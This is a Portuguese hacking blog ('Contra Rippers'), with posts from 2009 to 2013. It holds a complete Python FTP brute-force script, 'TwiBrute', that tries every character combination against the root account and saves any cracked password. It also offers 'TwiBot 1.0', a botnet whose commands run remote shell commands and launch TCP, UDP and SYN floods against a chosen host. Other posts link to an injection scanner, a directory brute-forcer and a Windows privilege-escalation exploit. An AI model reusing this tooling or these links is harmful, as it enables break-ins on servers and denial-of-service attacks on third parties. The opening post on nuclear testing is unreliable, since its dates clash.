Contra Rippers

sexta-feira, 16 de agosto de 2013

Armamento Nuclear Brasileiro

0 comentários

O governo brasileiro está construindo instalações subterrâneas na serra do Cachimbo, sul do Pará, limite com Mato Grosso, para fins militares. São covas e cisternas que pelas suas características se prestam a testes nucleares de diversos tipos e ao armazenamento de lixo atômico de usinas.

Desde 1981 têm sido realizados levantamento geológicos e hidrológicos na área. No mês passado foi concluída a construção de um poço de 320m de profundidade por um metro de diâmetro. A área de testes deverá ser concluída em 1991.

quarta-feira, 31 de julho de 2013

NSA usa o software X-Keyscore para espionagem

0 comentários
Após ler notícias descobri que o nome de um software que a NSA usa, ele se chama X-Keyscore, ele captura requisições HTTP e assim consegue obter informações de facebook, google, emails, etc. Provavelmente eles devem ler o meu blog \o/.

Achei interessante o método como ele funciona e vou colocar os mano para tentar recriar um desses, quem tiver mais informações sobre esse software pode comentar aqui no post.

Abaixo retirei de um site de noticias dos EUA, deixei em inglês mas quem quiser pode traduzir(google translator forever)



quarta-feira, 24 de julho de 2013

Automatização com arquivo de Texto

0 comentários
Para quem não manja de programação uma ótima solução para não ficar em arquivos de lote (.bat) é usar o método que vou mostrar agora.

Qual a diferença para o Arquivo de Lote?

O arquivo de lotes serve para automatizar tarefas e só reconhece comandos do ms-dos, então por exemplo, se tentarmos conectar a um servidor ftp não será possível enviar nenhum comando além do ftp ftp.servidor.com, depois disso ele irá pertencer a outra aplicação.

Um dos meios de resolver isso seria usar ftp –s:comandos.txt, isso porque o ftp suporta a entrada de um arquivo de text, mas caso seja necessário usar uma aplicação que não seja dessa forma não haverá como prosseguir.

Uma forma de fazer seria usar também um arquivo de texto que acabará sendo da mesma forma do ftp, veja:

----Arquivo.txt----
Color a
cls
ftp ftp.servidor.com
usuário
senha
dir
[..comandos..]

------------------------
Logo depois é só colocar assim no ms-dos:

cmd.exe < arquivo.txt


Ambos os métodos podem ser muito uteis se bem usados, lógico nada supera a programação,  esse é apenas um método de automação de certas coisas quem sabe até criar um exploit.

sábado, 20 de julho de 2013

Perguntas para Kevin Mitnick

0 comentários
Essa entrevista é do ano passado, muitos já viram mas outros muitos não então está ai:

O Gizmodo US e o io9 colocaram Mitnick em um interrogatório (do bem!) conduzido pelos leitores. Era jogo rápido: o pessoal perguntava, o hacker respondia logo em seguida. Dentre as muitas perguntas feitas e respondidas, separamos as mais legais, curiosas e úteis. Antes, porém, um pequeno relato do próprio Mitnick:
“No fim do Ensino Médio, deixaram eu assistir a uma aula de ciência da computação na Monroe High School. Para lhe dar uma ideia da tecnologia naquela época, usávamos um modem acoplador acústico e um terminal de teletipo. Então quando você escrevia programas em Basic e Fortran no computador, você os digitava no teletipo e podia ouvi-lo disparar enquanto formava seu programa. Era quase como mágica para mim. Eu poderia escrever programas nesse terminal que se conecta a este cérebro computacional que o manda fazer o que eu quiser.

domingo, 17 de fevereiro de 2013

Twitter Invadido, Vulnerabilidade Java

0 comentários


Para quem lê noticias deve ter visto que o Twitter foi invadido por uma falha no java. Fiquei sabendo queo facebook também foi invadido e o anonymous publicou na pagina do facebook, lembrando que eles tinham dito que a #operação_facebook não era oficial (migué).

quinta-feira, 26 de janeiro de 2012

TwiBot 1.0

2 comentários
O pessoal do IRC (cooler, m0nad) me deu a ideia de fazer um repositório para colocar os codes desenvolvidos: https://github.com/twijohn/Twi-John-Codes

Continuando com o post... Esse é o Botnet que desenvolvi há um tempo já, TwiBot 1.0 agora está disponível para vocês, segue o link:


https://github.com/twijohn/Twi-John-Codes/blob/master/twibot.py

Ele é bem simples de se utilizar, as funções estão no código nele, mas não custa eu colocar aqui:

--connect [PASSWORD] Obs: Primeira coisa a fazer, conectar os bots
--execute [COMMAND] Obs: Comando no Terminal
--tcp_attack [HOST] [PORT] [SIZE] [TIME]
--udp_attack [HOST] [PORT(use - for all ports)] [SIZE] [TIME]
--syn_attack [HOST] [PORT] [TIME]
--speak [MESSAGE] Obs: Para conversar com as pessoas do canal (Mode: Anal Raquel)
--quit

domingo, 8 de janeiro de 2012

Freenode Channels

0 comentários

quinta-feira, 22 de dezembro de 2011

PHP Injection Scanner

2 comentários
http://tynipic.com/images/viu1324609191o.png

É um pouco antigo já, mas quem sabe pode ser útil para alguém.

Esse Tool utiliza as técnicas de RFI e LFI


Download aqui

quarta-feira, 30 de novembro de 2011

#Humor - Instalando Programas Linux

0 comentários

Sempre tem vacilação para instalar..

quarta-feira, 16 de novembro de 2011

#Paper - WinSocket em C

0 comentários
Bom gente abaixo segue um paper do Felix_Poison (faz tempo que não o vejo) que fala sobre winsocket, para quem não sabe é diferente programar socket em linux e windows.

#######################################################
##               NEMESIZ SECURITY GROUP              ##
##                www.nemesiz.forum.st               ##
##                                                   ##
##          Winsockets Em C - Por Felix_Poison       ##
#######################################################
                                                      !
#######################################################

domingo, 13 de novembro de 2011

Insecuritynet

0 comentários
Para não falarem que só estou postando merda (e estou).

Hoje me deparei com o site de um cara que conheci a muito tempo, alias do tempo que ele tinha um software "simples", alias o Insecuritynet 1.0 se não me engano.

Então ele desenvolve ferramentas em C++ grafico, bem daora pelo menos para mim.

quinta-feira, 27 de outubro de 2011

Hacker virando Banker

4 comentários
https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVmgt7LJLEVK2Ya3324kYV4OD0DpqDDHlGrcwRhSL6nmcfqbeOJr4lyOpsWt9KYUEIQAlBZOj21wtSuIu3_zvTSskPj2RuCpGPOFVdSmSIuhdh-fbevTMKPaismr-pCV4ehiOrp6L66tU/s320/nerd.jpg

Todo jovenzinho começa no Hacketerismação e pensa que tudo vai ser fácil mas, descobre que seu conhecimento não serve de nada sem um diploma, o FBI não irá lhe contratar se você invadir o sistema deles.

terça-feira, 2 de agosto de 2011

Diretory Find

0 comentários
Encontre diretorio por brute-force. Muitas vezes wordlist não é suficiente para achar então é necessário que use todas as combinações possíveis.

http://i55.tinypic.com/dllqgw.png
Imagem By Nyuu

sexta-feira, 21 de maio de 2010

TwiBrute

0 comentários


Bom, vou postar aqui pra vocês um script que eu fez faz tempo, que quebra senhas por combinação de FTP.
Sabemos que é bem dificil encontrar um desse na internet, um dos motivos pelo qual eu fiz, então espero que não me rippem.
Dois campos que podem ser alterados no codigo são esse:

user = "root" // Coloquei root, pois conseguindo essa senha você ja consegue o root no sistema

chars = "abcdefghijklmnopqrstuvxwyz0123456789" // Os caracteres que ele usará para quebrar a senha.

#!/usr/bin/python

import socket
import sys, string
from itertools import product



if len(sys.argv) !=3:
print("Usage: "+ sys.argv[0] + " ")
print("Ex: "+ sys.argv[0] + " 127.0.0.1 7")
sys.exit(1)

img = """

______ __ __ ____ ____ ____ __ __ ______ ___
| T| T__T Tl j | \ | \ | T T| T / _]
| || | | | | T | o )| D )| | || | / [_
l_j l_j| | | | | | | T| / | | |l_j l_jY _]
| | l ` ' ! | | | O || \ | : | | | | [_
| | \ / j l | || . Yl | | | | T
l__j \_/\_/ |____j l_____jl__j\_j \__,_j l__j l_____j


Coded By Twi John


"""

host = sys.argv[1]
user = "root"
chars = "abcdefghijklmnopqrstuvxwyz0123456789"

print (img)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

x = False
erro = ""

s.connect((host, 21))
s.recv(1024)
while x != True:
MAX_CHARS = int(sys.argv[2])
for nletters in range(MAX_CHARS):
for word in product(chars, repeat=nletters + 1):
try:
s.send("USER " + user +"\r\n")
s.recv(1024)
s.send('PASS '+''.join(word)+'\r\n')
print(''.join(word))
password = (''.join(word)+'\n')
erro = s.recv(3)
if erro == "230":
x = True
print("Password :"+ password)
f = open("userpass.txt","w")
f.write("Password :"+ password)
sys.exit(2)
except socket.error:
s.close()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,21))
s.send("USER " + user +"\r\n")
s.recv(1024)
s.send('PASS '+''.join(word)+'\r\n')
print(''.join(word))
password = (''.join(word)+'\n')
erro = s.recv(3)
if erro == "230":
x = True
print("Password :"+ password)
f = open("userpass.txt","w")
f.write("Password :"+ password)
sys.exit(2)

quinta-feira, 3 de setembro de 2009

Invadindo FTP com exploit

0 comentários
Por Twi John

Estarei mostrando como invadir FTP com um exploit pronto, além de FTP você pode usar a mesa técnica para invadir Telnet, SSH entre outros.

A falha usada será buffer overflow, não estarei mostrando como funciona a falha, apenas mostrarei como invadir, já que não é aula de programação.
Estarei mostrando um exploit já muito antigo, mais facil de entender, por isso escolhi ele, este guia estará guiando você não ensinando receita de bolo.

quarta-feira, 5 de agosto de 2009

SecurityTube

0 comentários
Um site de videos de security e hacking.

http://securitytube.net/

Microsoft Windows XP (win32k.sys) Local Privilege Escalation Exploit

0 comentários
////////////////////////////////////////////////////////////////////////////////////
// +----------------------------------------------------------------------------+ //
// | | //
// | Microsoft Corporation - http://www.microsoft.com/ | //
// | | //
// | Affected Software: | //
// | Windows XP Service Pack 2 | //
// | Windows XP Service Pack 3 | //
// | | //
// | Affected Driver: | //
// | Multi-User Win32 Driver - win32k.sys <= 5.1.2600.5796 | //
// | | //
// | Local Privilege Escalation Exploit | //
// | For Educational Purposes Only ! | //
// | | //
// +----------------------------------------------------------------------------+ //
// | | //
// | NT Internals - http://www.ntinternals.org/ | //
// | alex ntinternals org | //
// | 30 July 2009 | //
// | | //
// | References: | //
// | Exploiting Common Flaws in Drivers | //
// | Ruben Santamarta - http://www.reversemode.com/ | //
// | | //
// +----------------------------------------------------------------------------+ //
////////////////////////////////////////////////////////////////////////////////////

Exploit:
http://www.ntinternals.org/win32k/NtUserConsoleControl_Exp.zip
back: http://milw0rm.com/sploits/2009-NtUserConsoleControl_Exp.zip

Description:
http://www.ntinternals.org/index.html#09_07_30

# milw0rm.com [2009-07-30]

quinta-feira, 14 de maio de 2009

Novo recurso do Google 'dedura' problema do próprio Google

0 comentários
Novidade permite buscas por conteúdo postado nas últimas 24 horas.
Internautas puderam ler informações 'instantâneas' sobre falha do Google.

Juliana Carpanez Do G1, em São Paulo

Nesta semana, o Google anunciou mudanças em seu sistema de buscas permitindo, por exemplo, que os internautas procurem informações que acabaram de ser postadas na internet. Com isso, aqueles com acesso à página puderam ler, na quinta-feira (14), informações referentes a uma falha do próprio Google – por conta do problema, diversos internautas do mundo inteiro ficaram sem acesso aos serviços da empresa.

Foto: Reprodução

A iniciativa de buscas instantâneas é uma resposta ao microblog Twitter, que com esta alternativa tornou-se um “termômetro” dos assuntos mais comentados em um determinado período de tempo. Nesta quinta, por exemplo, o Twitter apontava o assunto #GoogleFail (falha do Google) como o mais usado da página.

Para ter acesso aos novos recursos do Google, o internauta deve entrar na página em inglês, fazer uma busca -- nesse caso por “Google Fail” -- e clicar em “Show Options”, na página de resultados. Em “recent results”, é possível escolher entre ver apenas os links de conteúdo postado nas últimas 24 horas, da última semana ou do último ano.

O Google também permite que o usuário tenha acesso somente a conteúdo de determinadas categorias, como vídeos e fóruns.

terça-feira, 5 de maio de 2009

GMail Service CSRF Vulnerability

0 comentários
http://www.securiteam.com/securitynews/5ZP010UQKK.html

How Conficker makes use of MS08-067

0 comentários
http://www.milw0rm.com/papers/320